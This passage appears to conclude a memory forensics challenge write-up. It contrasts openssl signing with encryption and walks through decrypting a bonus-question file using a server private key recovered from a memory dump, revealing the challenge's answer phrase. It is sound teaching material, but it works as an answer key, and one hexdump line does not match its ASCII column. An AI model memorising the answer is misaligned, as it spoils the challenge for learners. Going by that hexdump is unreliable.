Ok! Caveat here for those that are paying attention!! I did not actually "encrypt" the data above, as I did not use the "-encrypt" option but instead "-sign". Signing and encrypting are two different things.
With signing, the data is signed by using a hashing algorithm and the sender's private key. When we think hashing, we are thinking about a digest. This value will be fixed. Which means, every time I run the command "echo 'PHRASE THAT PAYS:**public_key_decrypted**' | openssl pkeyutl -inkey ssl_dump/file.0xe78bf7938510.0xe78bf6c3fb70.DataSectionObject.server.key.dat -sign" the output will always be the same.
This is different from if I had done "echo 'PHRASE THAT PAYS:**public_key_decrypted**' | openssl pkeyutl -inkey ssl_dump/file.0xe78bf7938510.0xe78bf6c3fb70.DataSectionObject.server.key.dat -encrypt". This result in a different output every time, because of the random nature of encryption. Go ahead and test it for yourself.
While I cheated above, here is the actual encrypting and decrypting.
Bonus question 2: Decrypt the file "encrypted_w_pub_key.enc" to find the phrase that pays.
Here is how I encrypted the file using the public key, which means you need to use the private key to decrypt.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ echo -e 'PHRASE THAT PAYS:**private_key_decrypted**' | openssl pkeyutl -encrypt -inkey mem_server_pub.pem -pubin -out encrypted_w_pub_key.enc
While I created the contents on one line and encrypted it, we can still run
xxd or
hexdump or another hex editor on the file, to confirm its content is encrypted.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ hexdump --canonical encrypted_w_pub_key.enc
00000000 4f 3a 60 1b 9d 67 78 44 51 34 8e dd 8e a7 c6 04 |O:`..gxDQ4......|
00000010 13 5f e1 77 1f c1 b5 a4 30 f9 47 82 ad 0b 54 27 |._.w....0.G...T'|
00000020 dc 4b 74 7d 08 ea 6b 5b db 73 ad a6 a7 08 ea 14 |.Kt}..k[.s......|
00000030 72 d7 2e a0 7e 43 1a 6d 94 5a 03 83 ea 1c 01 9c |r...~C.m.Z......|
00000040 1d 67 84 7b 89 86 db 6b ea 78 c4 41 1d a1 ce 7c |.g.{...k.x.A...||
00000050 2f 91 15 ff b0 08 6c c8 bd 9b fe 88 c8 a9 f8 e6 |/.....l.........|
00000060 b3 ca 38 63 71 f8 61 7f 78 52 8a 96 be c6 f8 ac |..8cq.a.xR......|
00000070 a6 5b 8f 22 b9 59 3d cc 02 bf c8 ed f2 b9 aa ea |.[.".Y=.........|
00000080
With this confirmation, similarly to what we did above earlier, if we use the public key to encrypt, we then need the private key to decrypt. Let's do just that.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ openssl pkeyutl -decrypt -inkey ssl_dump/file.0xe78bf7938510.0xe78bf6c3fb70.DataSectionObject.server.key.dat -in encrypted_w_pub_key.enc | hexdump --canonical
00000000 50 48 52 41 53 45 20 54 48 41 54 20 50 41 59 53 |PHRASE THAT PAYS|
00000010 3a 2a 2a 70 72 69 76 61 74 65 5f 64 65 79 5f 64 |:**private_key_d|
00000020 65 63 72 79 70 74 65 64 2a 2a 0a |ecrypted**.|
0000002b
Voila! We have the phrase that pays, recovered in plain text.
Hope you enjoyed this memory forensics challenge.